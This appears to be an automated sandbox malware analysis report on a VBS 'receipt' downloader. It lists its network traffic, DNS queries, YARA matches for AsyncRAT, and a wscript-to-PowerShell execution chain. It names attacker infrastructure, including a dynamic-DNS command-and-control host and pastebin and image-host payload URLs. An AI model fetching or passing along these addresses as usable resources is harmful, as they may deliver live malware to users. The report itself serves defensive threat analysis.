Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.153.147.50:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.3:49735 version: TLS 1.2

Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe.16.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe.16.dr

Spreading

Yara detected VBS Downloader Generic

Source: Yara match

File source: E7236252-receipt.vbs, type: SAMPLE

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xwormay8450.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses dynamic DNS services

Source: unknown

DNS query: name: xwormay8450.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.3:49736 -> 12.221.146.138:8450

Source: moquenqueiro.vbs.12.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: moquenqueiro.vbs.12.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /nm/xwomay.txt HTTP/1.1Host: www.evolve27.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.21.45.138 104.21.45.138
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 12.221.146.138 12.221.146.138

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ATT-INTERNET4US ATT-INTERNET4US

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.43
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.155
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.43
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.155
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.5
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	HTTP traffic detected: GET /raw/eCmZ7z04 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=ATnOdpEYx+LGGt1&MD=BL1LyFpe HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIm2yQEIorbJAQipncoBCL/qygEIlKHLAQiLq8wBCIWgzQEI3L3NAQi4yM0BCLnKzQEIitPNAQj1080BCMzWzQEIp9jNAQi22M0BCPnA1BUYuL/NARj1yc0BGLnSzQEYx9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIm2yQEIorbJAQipncoBCL/qygEIlKHLAQiLq8wBCIWgzQEI3L3NAQi4yM0BCLnKzQEIitPNAQj1080BCMzWzQEIp9jNAQi22M0BCPnA1BUYuL/NARj1yc0BGLnSzQEYx9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIm2yQEIorbJAQipncoBCL/qygEIlKHLAQiLq8wBCIWgzQEIuMjNAQi5ys0BCIrTzQEIttjNARj1yc0BGMfYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /nm/xwomay.txt HTTP/1.1Host: www.evolve27.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=ATnOdpEYx+LGGt1&MD=BL1LyFpe HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: global traffic	DNS traffic detected: DNS query: www.evolve27.com
Source: global traffic	DNS traffic detected: DNS query: xwormay8450.duckdns.org

Source: wscript.exe, 00000000.00000003.1527457054.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291349735.0000020BD93C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530914537.0000020BD93B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1502175170.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1534107860.0000020BD96B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1532050055.0000020BD7658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291388676.0000020BD7658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291672870.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291600377.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1533992519.0000020BD93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1532021416.0000020BD93E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1533649699.0000020BD7672000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291744257.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519975863.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530256989.0000020BD767C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1533019445.0000020BD93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291639605.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291528746.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291324362.0000020BD7649000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1531151710.0000020BD762F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291707818.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
Source: wscript.exe, 00000000.00000003.1291707818.0000020BD93BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291495156.0000020BD93B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxcho
Source: wscript.exe, 00000000.00000003.1527457054.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1502175170.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291672870.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291600377.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1532021416.0000020BD93E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291744257.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519975863.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291639605.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291528746.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291707818.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291563308.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1291434213.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
Source: svchost.exe, 00000008.00000002.2604956419.000001C941A00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000008.00000002.2605210828.000001C941ADF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000008.00000002.2605210828.000001C941ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2604956419.000001C941A00000.00000004.00000020.00020000.00000000.sdmp, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/hhbs2fc5gftn5wsvpbv6ueh5wy_2024.4.30.0/go
Source: svchost.exe, 00000008.00000002.2605084631.000001C941A92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.2377170061.000001D897965000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chromecache_79.9.dr	String found in binary or memory: http://www.broofa.com
Source: chromecache_85.9.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_85.9.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: powershell.exe, 00000005.00000002.2377170061.000001D89796D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.2377170061.000001D8979BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: chromecache_79.9.dr, chromecache_85.9.dr	String found in binary or memory: https://apis.google.com
Source: chromecache_85.9.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_85.9.dr	String found in binary or memory: https://content.googleapis.com
Source: chromecache_85.9.dr	String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: chromecache_85.9.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_79.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_79.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_79.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_79.9.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000008.00000003.1555875051.000001C941870000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: wscript.exe, 00000000.00000002.1534311589.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1527581332.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519793569.0000020BD9757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.1291434213.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, E7236252-receipt.vbs	String found in binary or memory: https://pastachiotabin.com/raw/achiotaCmZ7z04
Source: wscript.exe, 00000000.00000002.1534311589.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1527581332.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519793569.0000020BD9757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: wscript.exe, 00000000.00000003.1527457054.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1502175170.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1534292787.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1534066935.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1529377906.0000020BD971E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519975863.0000020BD93DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530501627.0000020BD9726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520181474.0000020BD93DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1531835435.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1533972491.0000020BD93B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1532208467.0000020BD9905000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519975863.0000020BD93CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/eCmZ7z04
Source: wscript.exe, 00000000.00000002.1534292787.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1529377906.0000020BD971E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530501627.0000020BD9726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1531835435.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/eCmZ7z04H
Source: wscript.exe, 00000000.00000002.1534292787.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1529377906.0000020BD971E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1530501627.0000020BD9726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1531835435.0000020BD9727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/eCmZ7z04bH
Source: wscript.exe, 00000000.00000002.1533722500.0000020BD76D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1529425049.0000020BD76D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/eCmZ7z04tart
Source: wscript.exe, 00000000.00000002.1534311589.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1527581332.0000020BD974F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1519793569.0000020BD9757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/t8l
Source: chromecache_79.9.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_85.9.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_85.9.dr	String found in binary or memory: https://plus.googleapis.com
Source: powershell.exe, 00000005.00000002.2377170061.000001D897F86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
Source: chromecache_85.9.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: chromecache_85.9.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_85.9.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_79.9.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_79.9.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_79.9.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.153.147.50:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.3:49735 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4652, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8818
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8818			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

